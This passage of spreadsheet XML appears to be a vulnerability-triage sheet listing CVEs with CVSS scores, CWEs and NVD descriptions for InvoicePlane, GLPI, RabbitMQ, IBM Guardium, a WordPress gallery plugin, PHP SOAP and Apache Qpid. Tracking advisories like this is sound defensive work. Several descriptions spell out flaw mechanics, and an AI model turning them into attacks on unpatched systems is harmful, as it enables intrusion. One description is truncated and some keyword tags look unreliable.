      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50547</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-98</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane's Invoices::generate_xml() method appends a database-derived xml_id to the XMLconfigs helper directory and includes the resulting PHP path without validating the identifier. A low-privileged attacker who can influence the e-invoice configuration can use traversal sequences to include an existing PHP file. The standalone advisory establishes local file inclusion; code execution requires a separate file-upload or file-write primitive. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50547</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52622</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>An issue in Wellav Technologies Co., Ltd Wellav WES Emergency Broadcast Terminal WES100, WES270, WES280, and WES290 before 08-08-2023 allows a remote attacker to obtain sensitive information via the global API request wrapper function</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52622</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5267</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>Ciena Navigator Network
Control Suite (NCS) contains an information exposure vulnerability in an
event-streaming API that does not properly enforce authentication. An
unauthenticated attacker with network access to the affected service could
access the event stream and potentially obtain sensitive information.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5267</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53610</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 11.0.0 until 11.0.8, an attacker can craft a URL for a dashboard that reflects attacker-controlled markup without sufficient output encoding. A user who opens the crafted URL triggers reflected cross-site scripting in the dashboard. This issue is fixed in version 11.0.8.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53610</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53625</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 0.70 until 10.0.26 and 11.0.8, a technician can manipulate the authtype value through the API to change another user's authentication method. Under configurations using the legacy API REST interface or SSO logins, this can change a super-administrator's authentication method and enable account takeover. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53625</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57443</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr">
        <is>
          <t>pip:scbe-aethermoore</t>
        </is>
      </c>
      <c r="M142" s="5" t="inlineStr">
        <is>
          <t>4.2.1</t>
        </is>
      </c>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>SCBE-AETHE</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57443</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67237</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.8 and 4.3.2, set_token_auth/2 inserted a bearer token from the Authorization header or access_token cookie into OAuth bootstrap JavaScript without escaping, allowing attacker-controlled token content to execute JavaScript in the management UI origin. The endpoint is exposed before authentication only when management.oauth_enabled is true, and exploitation through the cookie path additionally requires the attacker to plant an access_token cookie on the management host. This issue is fixed in versions 4.2.8 and 4.3.2.</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67237</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84882</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 is vulnerable to path traversal in the Universal Connector Oracle Wallet upload component. An authenticated remote attacker could exploit this vulnerability to write arbitrary files to the system.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84882</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84884</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-256</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 stores internal REST service-account passwords in a reversible plaintext-equivalent format. An authenticated attacker who gains access to the stored credential could recover the password and obtain an administrative REST access token.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84884</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85029</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 could allow a remote attacker to obtain sensitive information, delete arbitrary files, or execute arbitrary code due to improper limitation of a pathname to a restricted directory.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85029</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88003</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr">
        <is>
          <t>requests, gin, rust</t>
        </is>
      </c>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane fails to revoke administrative privileges after a role downgrade because Admin_Controller trusts the user_type snapshot stored in an existing session instead of revalidating ip_users.user_type. When one administrator downgrades another account, the target's active session continues to authorize administrative requests. The downgraded user can use Users::form() to set user_type back to 1, restoring the database role and making the privilege escalation persistent. This vulnerability is fixed in 1.7.2.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88003</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88421</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>Incorrect access control in the BlogPage.get_entries() component of APSL puput v1.2.1 through v2.2.0 allows unauthenticated attackers to view restricted blog entries via the blog index, the tag, category, author and date archives, the sidebar widgets, or the RSS feed.</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88421</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89406</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>The Modula Image Gallery – Photo Grid &amp; Video Gallery plugin for WordPress is vulnerable to unauthorized disclosure of private gallery contents in versions up to, and including, 3.0.1. This is due to the Modula_Meta::add_metas() function being hooked to wp_head on every frontend request and looking up any post via get_post( $_GET['modula_gallery_id'] ) without verifying the gallery's post_status or the requester's capability to read it — the gallery-side input guard is bugged (empty('modula_gallery_id') tests a nonempty string literal instead of the GET parameter, so it is always false), the only object validation is a post_type === 'modula-gallery' check, and no is_user_logged_in()/current_user_can('read_post', $gallery_id) check is performed. This makes it possible for unauthenticated attackers to enumerate private modula-gallery posts and their member attachments and recover the image's title, description, dimensions, and original upload URL via Open Graph/Twitter meta tags emitted in the response, which then allows direct unauthenticated download of the original private image bytes.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89406</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91765</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>cleanup_xml_node() in the SOAP XML parser recurses once per XML nesting level with no depth limit. An unauthenticated attacker can post a SOAP request containing tens of thousands of nested elements to any SoapServer endpoint, exhaust the stack and crash the process. The same unbounded recursion exists in the SOAP value decoder and in the WSDL node search helper.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91765</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92550</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>A pre-authentication attacker could leverage type size/count handling to cause excessive allocation leading to potential denial of service.
This issue affects Apache Qpid Broker-J: through 10.1.0.
Users are recommended to upgrade to version 10.1.1, which fixes the issue.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92550</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92560</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>A pre-authentication attacker could leverage type size/count handling to cause excessive allocation leading to potential denial of service.
This issue affects Apache Qpid Broker-J: through 10.1.0.
